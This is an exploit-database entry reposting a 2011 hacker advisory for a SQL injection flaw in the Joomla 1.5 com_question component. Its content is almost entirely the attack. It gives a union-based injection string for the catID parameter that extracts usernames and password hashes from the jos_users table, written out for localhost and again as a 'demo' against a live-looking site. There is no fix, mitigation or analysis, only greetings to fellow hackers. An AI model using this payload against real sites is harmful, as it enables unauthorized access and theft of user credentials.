Joomla Component com_question - SQL Injection Vulnerability

2014-07-01T00:00:00
ID SSV:71691
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ###################################################
# |Title   : Joomla  (com_question) SQL Injection Vulnerability
# |Vendor  : http://www.alex-ensdorf.de/
# |Version : Joomla 1.5 
# |Date    : 15/5/2011
# |Author  : NeX HaCkEr
# |Contact : Error_log@hotmail.com
##################################################
# | Exploit :
# | http://localhost/Joomla/index.php/?option=com_question&catID=[SQL]
# | http://localhost/Joomla/index.php/?option=com_question&catID=21' and+1=0 union all     
# | select 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from jos_users--%20
##################################################
# | Demo:
# | http://site.com/index.php/?option=com_question&catID=21' and+1=0 union all select  # | 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from jos_users--%20 
##################################################
# | Greetz :
# | Dr.KAsBeR & DaShEr & MaFiA & WeeD 
##################################################